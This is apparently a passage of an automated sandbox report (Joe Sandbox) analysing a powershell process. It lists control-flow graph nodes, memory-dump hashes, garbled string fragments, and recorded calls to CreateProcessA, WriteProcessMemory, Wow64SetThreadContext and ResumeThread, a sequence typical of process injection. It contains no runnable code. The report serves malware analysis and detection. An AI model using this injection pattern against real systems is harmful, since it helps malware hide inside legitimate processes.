380e32-380e3c 448->455 450->449 454->455 456 380db4-380dd1 454->456 457 380e48-380e4e 455->457 458 380e3e-380e45 455->458 471 380e81-380e86 456->471 472 380dd7-380dd9 456->472 462 380e50-380e52 457->462 463 380e54-380e60 457->463 468 380e62-380e7e 462->468 463->468 466 380b82-380b84 464->466 465->466 466->423 470 380b8a-380b8c 466->470 475 380b9c 470->475 476 380b8e-380b9a 470->476 471->472 477 380ddb-380de1 472->477 478 380df3-380e08 472->478 481 380b9e-380ba0 475->481 476->481 482 380de3 477->482 483 380de5-380df1 477->483 487 380e8b-380ebc 478->487 488 380e0e-380e2c 478->488 481->423 486 380ba6-380bc6 481->486 482->478 483->478 497 380bc8-380bce 486->497 498 380bde-380be2 486->498 493 380ecc 487->493 494 380ebe-380eca 487->494 488->455 496 380ece-380ed0 493->496 494->496 499 380ef2-380efc 496->499 500 380ed2-380ed6 496->500 501 380bd0 497->501 502 380bd2-380bd4 497->502 503 380bfc-380c00 498->503 504 380be4-380bea 498->504 507 380efe-380f03 499->507 508 380f06-380f0c 499->508 500->499 509 380ed8-380eef 500->509 501->498 502->498 512 380c07-380c09 503->512 505 380bec 504->505 506 380bee-380bfa 504->506 505->503 506->503 510 380f0e-380f10 508->510 511 380f12-380f1e 508->511 513 380f20-380f3a 510->513 511->513 514 380c0b-380c11 512->514 515 380c21-380c78 512->515 518 380c13 514->518 519 380c15-380c17 514->519 518->515 519->515
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$T;)$$p$$p$$p
                    • API String ID: 0-506369389
                    • Opcode ID: 817ca20663bd9930136096cca99608238065533471d286e085b86535ac6dc990
                    • Instruction ID: 3755469336deac63de107bd4c9283ad0c76e256052eb5b9de3b11af31c83d5b0
                    • Opcode Fuzzy Hash: 817ca20663bd9930136096cca99608238065533471d286e085b86535ac6dc990
                    • Instruction Fuzzy Hash: 45C119317043448FCB6BAB78981077ABBB6AFC1314F2984EBD455CB292DA71DC49C762

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 524 380abc-380af3 525 380af9-380afe 524->525 526 380cce-380cfa 524->526 527 380b00-380b06 525->527 528 380b16-380b1a 525->528 534 380cfc-380d01 526->534 535 380d47-380d81 526->535 529 380b08 527->529 530 380b0a-380b14 527->530 531 380c7b-380c85 528->531 532 380b20-380b24 528->532 529->528 530->528 536 380c93-380c99 531->536 537 380c87-380c90 531->537 538 380b26-380b35 532->538 539 380b37 532->539 540 380d19-380d31 534->540 541 380d03-380d09 534->541 553 380da0 535->553 554 380d83-380d9e 535->554 542 380c9b-380c9d 536->542 543 380c9f-380cab 536->543 545 380b39-380b3b 538->545 539->545 557 380d3f-380d44 540->557 558 380d33-380d35 540->558 546 380d0b 541->546 547 380d0d-380d17 541->547 548 380cad-380ccb 542->548 543->548 545->531 549 380b41-380b61 545->549 546->540 547->540 572 380b80 549->572 573 380b63-380b7e 549->573 556 380da2-380da4 553->556 554->556 562 380daa-380dae 556->562 563 380e32-380e3c 556->563 558->557 562->563 564 380db4-380dd1 562->564 565 380e48-380e4e 563->565 566 380e3e-380e45 563->566 579 380e81-380e86 564->579 580 380dd7-380dd9 564->580 570 380e50-380e52 565->570 571 380e54-380e60 565->571 576 380e62-380e7e 570->576 571->576 574 380b82-380b84 572->574 573->574 574->531 578 380b8a-380b8c 574->578 583 380b9c 578->583 584 380b8e-380b9a 578->584 579->580 585 380ddb-380de1 580->585 586 380df3-380e08 580->586 589 380b9e-380ba0 583->589 584->589 590 380de3 585->590 591 380de5-380df1 585->591 595 380e8b-380ebc 586->595 596 380e0e-380e2c 586->596 589->531 594 380ba6-380bc6 589->594 590->586 591->586 605 380bc8-380bce 594->605 606 380bde-380be2 594->606 601 380ecc 595->601 602 380ebe-380eca 595->602 596->563 604 380ece-380ed0 601->604 602->604 607 380ef2-380efc 604->607 608 380ed2-380ed6 604->608 609 380bd0 605->609 610 380bd2-380bd4 605->610 611 380bfc-380c00 606->611 612 380be4-380bea 606->612 615 380efe-380f03 607->615 616 380f06-380f0c 607->616 608->607 617 380ed8-380eef 608->617 609->606 610->606 620 380c07-380c09 611->620 613 380bec 612->613 614 380bee-380bfa 612->614 613->611 614->611 618 380f0e-380f10 616->618 619 380f12-380f1e 616->619 621 380f20-380f3a 618->621 619->621 622 380c0b-380c11 620->622 623 380c21-380c78 620->623 626 380c13 622->626 627 380c15-380c17 622->627 626->623 627->623
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$$p$$p
                    • API String ID: 0-2931952147
                    • Opcode ID: 5f320ed6e068974cede42315adbe47afb4fed6443f3e5e2a72cf5206b1e3083d
                    • Instruction ID: 3adfc7732a7556a4f943a7caf546eb106695b5a2d9c3d88b1082dc1dbcc789f7
                    • Opcode Fuzzy Hash: 5f320ed6e068974cede42315adbe47afb4fed6443f3e5e2a72cf5206b1e3083d
                    • Instruction Fuzzy Hash: E931C1306003059FDFABAE28C91077A7BB5EF81318F2A41E6D8559F191DB75CC89CB62

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 743 382f48-382f6f 744 382f9c-382fd2 743->744 745 382f71-382f76 743->745 751 382fd8-382fe9 744->751 752 383092-3830da 744->752 746 382f78-382f7e 745->746 747 382f8e-382f96 745->747 749 382f80 746->749 750 382f82-382f8c 746->750 753 382f9b 747->753 749->747 750->747 757 382feb-382ff1 751->757 758 383003-383020 751->758 759 3830e0-3830e5 752->759 760 383206-383215 752->760 761 382ff3 757->761 762 382ff5-383001 757->762 758->752 774 383022-383044 758->774 763 3830fd-383101 759->763 764 3830e7-3830ed 759->764 775 38322d-383244 760->775 776 383217-38321d 760->776 761->758 762->758 765 3831b8-3831c2 763->765 766 383107-383109 763->766 769 3830ef 764->769 770 3830f1-3830fb 764->770 777 3831cf-3831d5 765->777 778 3831c4-3831cc 765->778 771 383119 766->771 772 38310b-383117 766->772 769->763 770->763 781 38311b-38311d 771->781 772->781 791 38305e-383076 774->791 792 383046-38304c 774->792 794 383249-383250 775->794 783 38321f 776->783 784 383221-38322b 776->784 779 3831db-3831e7 777->779 780 3831d7-3831d9 777->780 785 3831e9-383203 779->785 780->785 781->765 786 383123-38313b 781->786 783->775 784->775 799 38313d-383143 786->799 800 383155-38315c 786->800 801 383078-38307a 791->801 802 383084-38308f 791->802 796 38304e 792->796 797 383050-38305c 792->797 796->791 797->791 803 383145 799->803 804 383147-383153 799->804 806 38315e-383164 800->806 807 383174-3831b5 800->807 801->802 803->800 804->800 809 383168-383172 806->809 810 383166 806->810 809->807 810->807
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 89)$tPp
                    • API String ID: 0-774336855
                    • Opcode ID: 2343aaf25d7b9dace549e042eb2a9703454de276e12627fdac079e5bca065b96
                    • Instruction ID: 30bc97f89e45e4626bec842f30e8cbaf5960d5e211bb9c26173401a81a6d7441
                    • Opcode Fuzzy Hash: 2343aaf25d7b9dace549e042eb2a9703454de276e12627fdac079e5bca065b96
                    • Instruction Fuzzy Hash: 6B41D570A093859FC7239B24C8556AAFFB1AF86700F1A80DBD9859F393C6719D06C762
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p
                    • API String ID: 0-3973980265
                    • Opcode ID: 186af51fa768286b685308d8507fe46f2186bbde9cb51a88731bc8d2ca1fef02
                    • Instruction ID: 09178b04a0456020d70c6212baae1c8c8df45655ff9ef8082e3bae18b2a93d19
                    • Opcode Fuzzy Hash: 186af51fa768286b685308d8507fe46f2186bbde9cb51a88731bc8d2ca1fef02
                    • Instruction Fuzzy Hash: 34E0D8357043409ADB5A7674D4213ADBBAA7FD2360F2580DBC98186649CB318D17C392
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0102545F
                    Memory Dump Source
                    • Source File: 00000006.00000002.517162835.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1020000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 509fef1a28ba71b10eb78a8fa183bcc6e41e91497de47cabb040f16778804f16
                    • Instruction ID: de9a6b775c9c15575daa316e33c8a33270109b1a6e61b2f0bff4b52b9e4650b1
                    • Opcode Fuzzy Hash: 509fef1a28ba71b10eb78a8fa183bcc6e41e91497de47cabb040f16778804f16
                    • Instruction Fuzzy Hash: 05C10571D002298FDB25CFA8CC51BEDBBF1BF49300F0491A9E859A7290DB749A85CF85
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01015257
                    Memory Dump Source
                    • Source File: 00000006.00000002.517151910.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1010000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 2f87061986d9171c3c9a1bf0d0eca45c44d7d29134c106bbae43a9830d51eedf
                    • Instruction ID: e618cd58d28ca657a468d21fe5fa01f1accd882f7fd47a63d31c1930b2f963b2
                    • Opcode Fuzzy Hash: 2f87061986d9171c3c9a1bf0d0eca45c44d7d29134c106bbae43a9830d51eedf
                    • Instruction Fuzzy Hash: 66C11771D002198FDB25CFA8CC45BEEBBF1BF4A300F0491A9E859A7254DB749A85CF81
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00259ED7
                    Memory Dump Source
                    • Source File: 00000006.00000002.515858344.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 45a2ca19be5a40dfeb4ab6da88a45f6cf79e6d2e9eff562611d3601f2ddb915f
                    • Instruction ID: 611dac460bd4c220706a7386717d3f84a49b67ebca96e4428054fd8567c3e59e
                    • Opcode Fuzzy Hash: 45a2ca19be5a40dfeb4ab6da88a45f6cf79e6d2e9eff562611d3601f2ddb915f
                    • Instruction Fuzzy Hash: 2EC12370D10219CFCF25DFA8C891BEEBBB1BF09301F0091A9D859A7250DB749A99CF85
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0102FC3F
                    Memory Dump Source
                    • Source File: 00000006.00000002.517162835.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1020000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 7ecd23ede30495bdf035070d6538887470daad6b39180dfac0e9574f7c5c369e
                    • Instruction ID: a9138b499e3b518cf1bf3f34779f9cef3b2480c45275a62e2707bf279c05238b
                    • Opcode Fuzzy Hash: 7ecd23ede30495bdf035070d6538887470daad6b39180dfac0e9574f7c5c369e
                    • Instruction Fuzzy Hash: AEC12671D002298FDB25DFA8C850BEEBBF2BF49300F0491A9D859A7250DB749A85CF95
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0102A84F
                    Memory Dump Source
                    • Source File: 00000006.00000002.517162835.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1020000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: b3785f61548c8704dc05a1d4a483b6ad1b9ad6c55b821775d4bbdf7ced122a56
                    • Instruction ID: c38396367476e23873315f69a08c3f3b3da44f0493be473644c46e0a7558f646
                    • Opcode Fuzzy Hash: b3785f61548c8704dc05a1d4a483b6ad1b9ad6c55b821775d4bbdf7ced122a56
                    • Instruction Fuzzy Hash: 91C10371E00229CFDB25CFA9C845BEEBBF1BF49300F0095A9D859A7250DB749A85CF85
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0102545F
                    Memory Dump Source
                    • Source File: 00000006.00000002.517162835.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1020000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 74685f2f18dedbbaf7b3304c0617247e7724a099635430f0e0282e2849551cd4
                    • Instruction ID: afcf5e8b7a06838b77cc834df1eb8762b81f2f770dae4798ec423639a7c73073
                    • Opcode Fuzzy Hash: 74685f2f18dedbbaf7b3304c0617247e7724a099635430f0e0282e2849551cd4
                    • Instruction Fuzzy Hash: 7CC10671D002298FDB25CFA8CC51BEDBBF1BF49300F0491A9E859A7250DB749A85CF85
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025FACF
                    Memory Dump Source
                    • Source File: 00000006.00000002.515858344.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: a0ced617723baf5155f3883a9b4ba7f548f08c7ee2a26fed01cb6499e4da62d9
                    • Instruction ID: 63446d90ecbd2d9c1f9d0de5d840b0cca1abefb720e1c0454d58252808f0206f
                    • Opcode Fuzzy Hash: a0ced617723baf5155f3883a9b4ba7f548f08c7ee2a26fed01cb6499e4da62d9
                    • Instruction Fuzzy Hash: 0EC14571D0021A8FCF64CFA8C941BEEBBB1BF09305F0091A9D859B7250DB749A99CF85
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00259ED7
                    Memory Dump Source
                    • Source File: 00000006.00000002.515858344.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 0ea6365a8bba34e1edc447791d99bf1d89238f7963f1e64765d9df5fa334709d
                    • Instruction ID: a4cf5d5c0bf8ba33d25bb1c48d86335438b00c6f9c145d82dad899b5a4db0bf1
                    • Opcode Fuzzy Hash: 0ea6365a8bba34e1edc447791d99bf1d89238f7963f1e64765d9df5fa334709d
                    • Instruction Fuzzy Hash: 13C11371D102198FCF25DFA8C881BEEBBB1BF09301F0091A9D859A7250DB749A99CF85
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01015257
                    Memory Dump Source
                    • Source File: 00000006.00000002.517151910.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1010000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 6685e1c3bb4fd1484fe355edc1a97e103cf0b4854fff817131ec9587e621ea07
                    • Instruction ID: d8d1eedbeb1f22919289eb9e78fa0f0772598f386212de429918d063d0cf9c98
                    • Opcode Fuzzy Hash: 6685e1c3bb4fd1484fe355edc1a97e103cf0b4854fff817131ec9587e621ea07
                    • Instruction Fuzzy Hash: D8C11671D002198FDB25CFA8CC44BEEBBF1BF4A300F0491A9E559A7254DB749A85CF85
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00259943
                    Memory Dump Source
                    • Source File: 00000006.00000002.515858344.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: f30a60a98f3e99714fb40e5a481d349039f70437210a639536a99cbd63f1e22f
                    • Instruction ID: 7439e55ae838120b7eae53530c7dff4bc78ed0a86e65a07e0af6560938183b78
                    • Opcode Fuzzy Hash: f30a60a98f3e99714fb40e5a481d349039f70437210a639536a99cbd63f1e22f
                    • Instruction Fuzzy Hash: 0041AAB4D012489FCF00CFA9D984AEEFBB1BF49314F20942AE814BB250C375AA55CF64
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00259943
                    Memory Dump Source
                    • Source File: 00000006.00000002.515858344.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: e20e0d6973d81b3719a55b13111d26c47a013541685ff82021527b9a5be7f44f
                    • Instruction ID: 3f4a95a11e48f830fe88944328b8e1e883a6a3634346ba14666fc38e1c8a2d6b
                    • Opcode Fuzzy Hash: e20e0d6973d81b3719a55b13111d26c47a013541685ff82021527b9a5be7f44f
                    • Instruction Fuzzy Hash: AC41ABB4D002589FCF00CFA9D984AEEFBF1BB49314F20942AE818B7250D774AA55CF64
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 002596C7
                    Memory Dump Source
                    • Source File: 00000006.00000002.515858344.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 361f6163e4d3a86a56a36452711acff7328490e7c7e5ded906925dd63e122a40
                    • Instruction ID: fa6f8008c10acd2612f9e9828a627dbed608e461ab0246140b789a27c8b599a2
                    • Opcode Fuzzy Hash: 361f6163e4d3a86a56a36452711acff7328490e7c7e5ded906925dd63e122a40
                    • Instruction Fuzzy Hash: 6B41CDB4D00258DFCB10CFAAD884AEEFBB1AF49314F14842AE414B7244D7749989CF54
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 002596C7
                    Memory Dump Source
                    • Source File: 00000006.00000002.515858344.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: ee1ee69bd8fbc11e4bc7e326b842d575b9f245a54ad09effad48f54c70c8f878
                    • Instruction ID: 9ad18fc3561d8381e91527fd9526bdc0582e300ecc16c0b54fb63900ed0a0d69
                    • Opcode Fuzzy Hash: ee1ee69bd8fbc11e4bc7e326b842d575b9f245a54ad09effad48f54c70c8f878
                    • Instruction Fuzzy Hash: 7841BCB4D10258DFCF10CFAAD884AEEFBB5AF48314F14842AE414B7244C778A989CF54
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 002595A6
                    Memory Dump Source
                    • Source File: 00000006.00000002.515858344.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 5a2ca41b128e3685ecf9169cc4394859f7d03e8b5a913d229543a17d1fa5ad64
                    • Instruction ID: 869d94162dcd78896bad2b1d01f8c9086f1035812c37491fc38e68e340fab9d3
                    • Opcode Fuzzy Hash: 5a2ca41b128e3685ecf9169cc4394859f7d03e8b5a913d229543a17d1fa5ad64
                    • Instruction Fuzzy Hash: 9631DBB4D102489FCF14CFAAD984AEEFBB1AF49314F14942AE814B7350D735A945CF98
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 002595A6
                    Memory Dump Source
                    • Source File: 00000006.00000002.515858344.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 760d665a1ffc5e57ce5332335f632918fd7da56556f04eb75ab4c76ba7832477
                    • Instruction ID: 6d14c20089195fa92b9d18f06d7ee6dabee0e96a84912588032d9855266dba06
                    • Opcode Fuzzy Hash: 760d665a1ffc5e57ce5332335f632918fd7da56556f04eb75ab4c76ba7832477
                    • Instruction Fuzzy Hash: C031D9B4D102089FCF10CFAAD984AAEFBB1AF49314F10942AE814B7300D735A945CF98
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p
                    • API String ID: 0-481844870
                    • Opcode ID: 255818ae96b0172df3fef9806ad66e06e4a9559e56b796ef11ffa986c2630acc
                    • Instruction ID: 004910c281878a7cdb8523788409adf1f672f25112227ba41e59e4e77a13280c
                    • Opcode Fuzzy Hash: 255818ae96b0172df3fef9806ad66e06e4a9559e56b796ef11ffa986c2630acc
                    • Instruction Fuzzy Hash: 4321D131A00300DFCF62EF69C8487AABBE9AF84351F2980E6D509C7651D770C942CB91
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ac079a8757487ffd214a57b71f907dce4c6b947b66882ce3b7144cbd99d0a360
                    • Instruction ID: 28ce9a946d56cac7c518c093c59b0a4330cfd24e8881ec40482a3f99f8b48433
                    • Opcode Fuzzy Hash: ac079a8757487ffd214a57b71f907dce4c6b947b66882ce3b7144cbd99d0a360
                    • Instruction Fuzzy Hash: 5421D335A00B04CFCB22EF68D440B69B7B6AB88351F6A81A5D8099B201C7B1DD44CB91
                    Memory Dump Source
                    • Source File: 00000006.00000002.515696617.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_15d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 06801fb6736dc2c08e435a4832588de61e8a6e58a794b4bb600718f38d67be04
                    • Instruction ID: 58287b555b928e77b0a9f1b2a552e5e93019b684a1e282db9719e50dd7d3d0f4
                    • Opcode Fuzzy Hash: 06801fb6736dc2c08e435a4832588de61e8a6e58a794b4bb600718f38d67be04
                    • Instruction Fuzzy Hash: B2018F71508340EAE7204E29E8C4B67BF98EF41765F28841AFC694E2C6C7799849CBB1
                    Memory Dump Source
                    • Source File: 00000006.00000002.515696617.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_15d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cc3bbfca0b5901c86631ddae619e32feac1929b4124c67f849bf472b58b95022
                    • Instruction ID: 7ada60cc35e86a8259b59cb0b8e5e108120fdbe57185d8eb5032ea2da8825a28
                    • Opcode Fuzzy Hash: cc3bbfca0b5901c86631ddae619e32feac1929b4124c67f849bf472b58b95022
                    • Instruction Fuzzy Hash: 5401526140D3C09FD7124B259C94B62BFA4DF53225F1980DBE8948F2D7C2699848C772
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a6cb4c9a72990e451c427360e376fe76aa8580a4e8b5a5324eb9bacd39f420b7
                    • Instruction ID: 07737610ef161c6198be25167da4298121b6f2cd6f6ab901610b8441695c7ea4
                    • Opcode Fuzzy Hash: a6cb4c9a72990e451c427360e376fe76aa8580a4e8b5a5324eb9bacd39f420b7
                    • Instruction Fuzzy Hash: 71F0CD7075030867DA6466B9C816B7F69AB9FC8B00F548428F906EF3C5CDF2ED458326
                    Memory Dump Source
                    • Source File: 00000006.00000002.517162835.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1020000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15504bcdb4ea461752185c3ab20e03a667d4cf56cd56d2be9d3bfb64f6423366
                    • Instruction ID: 9e2045a11e761167949330b6572aaff5c4e6ec746022ade77a10f7ff4770de40
                    • Opcode Fuzzy Hash: 15504bcdb4ea461752185c3ab20e03a667d4cf56cd56d2be9d3bfb64f6423366
                    • Instruction Fuzzy Hash: C44159759883D29FC3578FB484E21E2BFB1EE1B32836945EDC5C08C427E22A5593DB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$`8)$`8)$`8)$$p$$p
                    • API String ID: 0-484574251
                    • Opcode ID: 18a6a82ccdbefac50d38e5c8ac8d4f810736ede6a9a59266383231115a3867c3
                    • Instruction ID: 688580bff3d9799fde06b54cac4164ddd2b14987c51ddff83e24241296071871
                    • Opcode Fuzzy Hash: 18a6a82ccdbefac50d38e5c8ac8d4f810736ede6a9a59266383231115a3867c3
                    • Instruction Fuzzy Hash: 6AE13A35700304DFCF5EAA68D81476E7BB6AFC5310F2980B6E9459B291CBB1CD45CBA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$h%f$h%f$h%f$h%f$tPp$tPp$)
                    • API String ID: 0-1613608164
                    • Opcode ID: f4c8c8bd6b1885d6af3aa8774c8f5c2423bb9f820c8bc1efed0d313b42b3f94c
                    • Instruction ID: 11720f6097e56f271c5261e9ddf88fc6810d0ff3c5429b9f6f7e4ab57b972e8d
                    • Opcode Fuzzy Hash: f4c8c8bd6b1885d6af3aa8774c8f5c2423bb9f820c8bc1efed0d313b42b3f94c
                    • Instruction Fuzzy Hash: 4CA137317043418FDB16AA78981677ABBA2AFC1310F2984FAD945CB296DE71DC02C792
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$4'p$4'p$$p$$p$$p
                    • API String ID: 0-3388297269
                    • Opcode ID: 65004ccdc67c63eb99ac9b8439f00b03691cadb464d9249fa25a7006517a8ecc
                    • Instruction ID: 37559308a967c87b47c12089ad8ef3e484f4f05d268b5688d48091f26193893b
                    • Opcode Fuzzy Hash: 65004ccdc67c63eb99ac9b8439f00b03691cadb464d9249fa25a7006517a8ecc
                    • Instruction Fuzzy Hash: 7551F531B083818FCB2A6A69981076AFBA5AFC1B10B2980FFC585C7351DB76CE51C791
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.515969027.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_380000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$`\f$`\f$h%f$h%f
                    • API String ID: 0-2528921848
